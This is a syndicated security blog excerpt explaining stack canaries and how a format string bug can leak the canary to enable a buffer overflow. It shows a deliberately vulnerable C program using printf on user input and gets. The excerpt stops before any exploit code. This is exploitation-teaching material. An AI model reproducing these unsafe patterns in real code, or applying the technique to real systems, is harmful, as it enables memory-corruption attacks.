Format String Vulnerabilities Exploitation Case Study - Security Boulevard

Format String Vulnerabilities Exploitation Case Study

Introduction:

In the previous article of this series, we discussed how format string vulnerabilities can be exploited. This article provides a case study of how format string vulnerabilities can be used to exploit serious vulnerabilities such as Buffer Overflows. We will begin by understanding what stack canaries are and then we will exploit a Buffer Overflow vulnerability by making use of a format string vulnerability.

What is stack canary?

Stack Canaries are used to detect a stack buffer overflow before execution is transferred to the user controlled code. This is achieved by placing a random value in memory just before the stack return pointer. To exploit a buffer overflow, attackers usually overwrite the return pointer. So in order to overwrite the return pointer, the canary value must also be overwritten. However, this value is checked to make sure it was not tampered with before a routine uses the return pointer on the stack. This technique can greatly increase the difficulty of exploiting a stack buffer overflow because it forces the attacker to gain control of the instruction pointer by some non-traditional means such as using memory leak vulnerabilities.

How to bypass stack canary protection?

Now that we understood how stack canaries work, let us discuss how we can bypass stack canaries and exploit the buffer overflow vulnerability. We are going to use the same vulnerable program for this exercise.

#include <stdio.h>

int main(int argc, char *argv[]){

    vuln_func(argv[1]);

    return 0;

}

void vuln_func(char *input){

    char buffer[256];

    printf(input);

    printf(“n”);

    gets(buffer);

}

 

The preceding program is vulnerable to two different vulnerabilities.

  1. A format string vulnerability 
  2. Stack Based Buffer Overflow

We will make use of the format string vulnerability to leak the stack canary and Stack Based Buffer Overflow to take control of the RIP register. (Read more...)

*** This is a Security Bloggers Network syndicated blog from Infosec Resources authored by Srinivas. Read the original post at: http://feedproxy.google.com/~r/infosecResources/~3/rOH_9aQHaJk/